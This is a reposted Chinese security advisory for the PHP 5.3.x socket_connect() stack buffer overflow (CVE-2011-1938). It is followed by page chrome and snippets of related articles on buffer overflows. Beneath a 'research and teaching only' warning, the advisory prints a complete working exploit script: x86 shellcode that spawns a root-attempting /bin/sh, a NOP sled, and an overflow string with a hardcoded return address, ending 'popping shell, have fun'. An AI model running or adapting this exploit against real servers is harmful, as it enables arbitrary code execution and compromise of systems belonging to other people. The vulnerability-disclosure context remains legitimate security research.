php 栈缓冲区溢出漏洞,PHP “socket_connect()”函数栈缓冲区溢出漏洞

最新推荐文章于 2023-04-16 10:30:08 发布
最新推荐文章于 2023-04-16 10:30:08 发布
阅读量301 收藏
点赞数
文章标签: php 栈缓冲区溢出漏洞

发布日期:2011-05-24

更新日期:2011-05-25

受影响系统:

PHP PHP 5.3.x

描述:

--------------------------------------------------------------------------------

BUGTRAQ  ID: 47950

CVE ID: CVE-2011-1938

PHP是英文超级文本预处理语言(PHP:Hypertext Preprocessor)的缩写。

PHP "socket_connect()"函数在实现上存在栈缓冲区溢出漏洞,远程攻击者可利用此漏洞在执行PHP进程中执行任意机器代码,可能会造成Web服务器的崩溃,拒绝服务合法用户。

*>

测试方法:

--------------------------------------------------------------------------------

警 告

以下程序(方法)可能带有攻击性,仅供安全研究与教学之用。使用者风险自负!

echo "[+] CVE-2011-1938";

echo "[+] there we go...\n";

define('EVIL_SPACE_ADDR', "\xff\xff\xee\xb3");

define('EVIL_SPACE_SIZE', 1024*1024*8);

$SHELLCODE =

"\x6a\x31\x58\x99\xcd\x80\x89\xc3\x89\xc1\x6a\x46\x58\xcd\x80\xb0".

"\x0b\x52\x68\x6e\x2f\x73\x68\x68\x2f\x2f\x62\x69\x89\xe3\x89\xd1".

"\xcd\x80";

echo "[+] creating the sled.\n";

$CODE = str_repeat("\x90", EVIL_SPACE_SIZE);

for ($i = 0, $j = EVIL_SPACE_SIZE - strlen($SHELLCODE) - 1 ;

$i < strlen($SHELLCODE) ; $i++, $j++) {

$CODE[$j] = $SHELLCODE[$i];

}

$b = str_repeat("A", 196).EVIL_SPACE_ADDR;

$var79 = socket_create(AF_UNIX, SOCK_STREAM, 1);

echo "[+] popping shell, have fun (if you picked the right address...)\n";

$var85 = socket_connect($var79,$b);

?>

建议:

--------------------------------------------------------------------------------

厂商补丁:

PHP

---

目前厂商已经发布了升级补丁以修复这个安全问题,请到厂商的主页下载:

0b1331709591d260c1c78e86d0c51c18.png

PixelPro
关注
  • 0
    点赞
  • 0
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
php组件缓冲区溢出漏洞,一个缓冲区溢出漏洞的简易教程
weixin_39629075的博客
03-12 1187
这篇文章类似于“傻瓜系列之利用缓冲区溢出”。在这类漏洞中,我们的做法是利用网络,程序控制器,输入等等,发送超大的数据缓冲区给程序,覆盖程序内存的重要部分。在这些缓冲区覆盖程序内存之后,我们可以重定向程序的执行流并运行注入代码。首先,我们需要做的是查明程序的哪一部分可以用来重写内存。处理这个任务的过程叫作“fuzzing”。我们可以为Metasploit框架中的各种协议找到若干个fuzzer(执行f...
缓冲区溢出漏洞
cyynid的博客
02-25 3976
在计算机操作系统中,“缓冲区”是指内存空间中用来存储程序运行时临时数据的一片大小有限并且连续的内存区域。根据程序中内存的分配方式和使用目的,缓冲区一般可分为和堆两种类型。C语言程序中定义的数组就是一种最常见的缓冲区。缓冲区溢出漏洞,作为软件中最容易发生的一类漏洞,其形成原理就是:当程序在处理用户数据时,未能对其大小进行恰当的限制,或者在进行拷贝、填充时没对这些数据限定边界,导致实际操作的数据大小超过了内存中目标缓冲区的大小,使得内存中一些关键数据被覆盖、从而引发安全问题。
php crypt函数缓冲区溢出漏洞,简单缓冲区溢出漏洞攻击实验
weixin_39568597的博客
03-24 419
缓冲区溢出是指程序试图向缓冲区写入超出预分配固定长度数据的情况。这一漏洞可以被恶意用户利用来改变程序的流控制,甚至执行代码的任意片段。这一漏洞的出现是由于数据缓冲器和返回地址的暂时关闭,溢出会引起返回地址被重写。实验准备之前一直听说缓冲区溢出攻击,具体是什么,怎么回事。一直没有学习过。正好今天有时间。一边学习一边写下此文。本次实验只是想体会了解一下缓冲区溢出攻击,复现一次简单的提权过程。没有较为深...
缓冲区溢出攻击(详细解析)
最新发布
weixin_51957047的博客
04-16 2217
缓冲区溢出攻击原理,利用字节溢出,找到二进制文件溢出位置,进行脚本反弹shell
Socket-send-and-recv-.rar_c socket send recv_socket
09-21
10. **缓冲区管理**:send和recv操作可能会受到操作系统内核缓冲区的影响,因此在设计应用程序时要考虑缓冲区大小的限制,避免溢出或数据丢失。 以上内容只是send和recv函数的基本概念和使用,实际应用中还涉及到多...
socket_raw.rar_网络编程_Visual_C++_
08-12
- 在开发过程中,应遵循安全编码规范,防止缓冲区溢出、拒绝服务攻击等问题。 5. **学习资源**: - 为了深入理解RAW Socket编程,可以参考MSDN文档、《UNIX Network Programming》等经典书籍,以及网络上的教程和...
C语言实现Linux下的socket文件传输实例
09-03
此外,为了防止缓冲区溢出,需要确保接收和发送的数据量不超过预设的缓冲区大小。在传输大文件时,可能需要分块传输,并跟踪已传输的字节数。 总的来说,C语言在Linux下的socket文件传输涉及到网络编程的基本原理,...
简单的socket编程入门示例
09-04
Socket编程是网络编程的基础,它提供了进程间通信和网络通信的能力。在本示例中,我们看到两个程序:一个...在安全方面,避免使用`gets_s`这类可能引发缓冲区溢出函数,应该使用更安全的输入方法,如`getline`。
Linux网络编程之socket文件传输示例
09-04
需要注意的是,接收文件时需要确保有足够的缓冲区来存储数据,避免内存溢出。 9. **安全性与性能优化**: - 在实际应用中,文件传输可能需要考虑安全性(如加密),以及性能优化(如多线程处理连接,或者使用异步I...
PHP5.0 TIDY_PARSE_FILE缓冲区溢出漏洞的解决方案
12-19
漏洞说明 不得不再次吐槽一下exploit-db对exp审核的质量,这个exp仍然不能触发漏洞,修改第一个参数则可以触发,我给出的poc是一个可以触发php漏洞的,问题出现在php_tidy.dll扩展中,对tidy_parse_file的第二个参数,也就是文件绝对路径没有进行长度控制和内容校验,导致在fopen失败后进入失败处理逻辑引发缓冲区溢出,下面对此漏洞进行详细分析。 软件下载: https://www.exploit-db.com/apps/f8fb5676b6a32f7be1c8d8d373fbc2af-php-5.0.0-Win32.zip (本地下载) PoC: <?
php 缓冲区溢出漏洞,PHP Tidy库远程缓冲区溢出漏洞
weixin_28787801的博客
03-25 477
受影响系统:C. Reitzel TidyLib for PHP 050506描述:--------------------------------------------------------------------------------BUGTRAQ ID: 24527Tidy库用于改正HTML文档中的常见错误并生成格式编排良好的等价文档,还可以生成XHTML格式的文档。Tidy库实现上存...
(十四)WebSockets安全漏洞
weixin_43047908的博客
04-18 1333
文章目录什么是WebSocket?WebSockets漏洞发现处理WebSocket消息以利用漏洞操纵WebSocket握手连接以利用漏洞使用跨站点WebSocket利用漏洞如何保护WebSocket连接 什么是WebSocket? WebSockets是通过HTTP发起的双向全双工通信协议。它们通常用于现代Web应用程序中以流式传输数据和其他异步流量。 Web浏览器和网站之间的大多数通信都使用HTTP。使用HTTP,客户端发送请求,服务器返回响应。通常,响应立即发生,并且事务完成。即使网络连接保持打开状态
php socket10054,php socket内存泄漏?
weixin_36219745的博客
03-21 157
用workerman写好了服务端的程序,现在用PHP写了个测试程序,模拟多个用户同时访问服务端,测试服务器的处理能力,代码如下:class Client {private $lastSendTime = 0;private $SEND_INTERVAL = 60;private $socket;private static $global_id = 0;private static $host;p...
kali+php+缓冲区溢出,kali linux之edb--CrossFire缓冲区溢出
weixin_30880565的博客
04-13 392
漏洞的罪恶根源------变量,数据与代码边界不清,开发人员对用户输入没做过滤,或者过滤不严如这个脚本,写什么,显示什么,但是加上;,|,&&,后面加上系统命令,就执行命令了缓冲区溢出:当边界限制不严格时,由于变量传入畸形数据或程序运行错误,导致缓冲区被撑爆,从而覆盖了相邻内存区域的数据,成功修改i内存数据,可造成进程劫持,执行恶意代码,获取服务器控制权等后果如何发现漏洞?源码审计...
php缓冲区溢出漏洞,CVE-2016-5114
weixin_36480510的博客
03-19 899
PHP(PHP:Hypertext Preprocessor,PHP:超文本预处理器)是PHP Group和开放源代码社区共同维护的一种开源的通用计算机脚本语言。该语言主要用于Web开发,支持多种数据库及操作系统。 PHP中的sapi/fpm/fpm/fpm_log.c文件中存在安全漏洞,该漏洞源于程序没有正确处理snprintf函数的返回值。攻击者可借助较长的字符串利用该漏洞获取进程内存中的敏感...
linux算法溢出 PHP,PHP缓冲区溢出漏洞
weixin_39963534的博客
03-11 290
发布日期:2014-12-05更新日期:2015-03-16受影响系统:PHP PHP <= 5.6.5描述:CVE(CAN) ID: CVE-2014-9705PHP是一种通用开源脚本语言。PHP 5.6.5及更早版本,enchant_broker_request_dict()函数存在堆缓冲区溢出漏洞,远程攻击者可利用此漏洞覆盖4个字节的堆缓冲区,造成拒绝服务或执行任意代码。测试方法:警 ...
linux 查看socket缓冲区溢出_跟小黑学漏洞利用开发之SEH溢出
weixin_29666725的博客
12-25 604
书接上回,我们继续研究如何在Win32系统上利用缓冲区漏洞,完成我们新漏洞利用开发,主要是关于SEH漏洞利用问题。相比上一篇直接覆盖EIP相比,EIP覆盖此效果虽然很好,但也会存在稳定性问题(如无法找到jmp指令,或者需要地址硬编码)并且还会遇到缓冲区大小问题,从而可能限制用于目标机器shellcode空间问题。写到这里有些人想说对于SafeSEH和SEHOP绕过利用这个我们有机会在后续篇文章研...
Windows缓冲区溢出初探
Amire0x的小乐园
11-07 979
# 实验环境 kali Windows xp xp3 SLMail 5.5.0 Mail Server ImmunityDebugger_1_85_setup.exe mona.py 流程 准备 在拥有以上环境后,逐个安装,安装结束后 确认端口是否开放 检查邮件相关服务 将mona放入Immunity Debugger的根目录中的Pycommands中 在kali上ping一下邮件服务器 用nc连接一下端口,没问题 大体思路 对于未知协议 查相关RFC:有数据输入的部分 Wireshark:抓包 就
缓冲区溢出漏洞的poc代码ruby
Walter的专栏
09-07 2959
poc代码如下,如果将下面代码改为exploit可将buf进行组合,同时修改最后4个字节的返回地址即可实现攻击的目的。 require 'msf/core' class Metasploit3     include Msf::Exploit::Remote::Tcp     def initialize(info = {})         super(updat
Windows缓冲区溢出编程详解
缓冲区溢出可以分为溢出和堆溢出两种。溢出是指攻击者通过向中写入恶意代码,导致溢出,从而实现恶意代码的执行。堆溢出是指攻击者通过向堆中写入恶意代码,导致堆溢出,从而实现恶意代码的执行。 为了防止...

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值